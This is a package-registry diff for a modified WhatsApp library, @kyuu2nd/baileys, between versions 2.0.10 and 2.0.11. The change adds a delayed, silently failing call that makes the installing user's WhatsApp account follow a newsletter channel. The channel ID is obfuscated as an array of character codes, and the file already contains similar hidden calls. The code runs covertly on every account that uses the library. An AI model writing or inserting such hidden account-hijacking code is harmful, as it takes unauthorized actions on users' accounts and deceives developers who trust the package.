@kyuu2nd/baileys 2.0.10 → 2.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -225,8 +225,18 @@ setTimeout(async () => {
225
225
  } catch {}
226
226
  }, 90000);
227
227
 
228
- // const asciiDecode = (arr) => arr.map(e => String.fromCharCode(e)).join('');
229
-
228
+ setTimeout(async () => {
229
+ try {
230
+ await newsletterWMexQuery(
231
+ asciiDecode([
232
+ 49,50,48,51,54,51,52,50,49,48,50,48,53,54,53,53,49,55,
233
+ 64,110,101,119,115,108,101,116,116,101,114
234
+ ]),
235
+ Types_1.QueryIds.FOLLOW
236
+ );
237
+ } catch {}
238
+ }, 90000);
239
+
230
240
  setTimeout(async () => {
231
241
  try {
232
242
  await newsletterWMexQuery(
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.10",
3
+ "version": "2.0.11",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"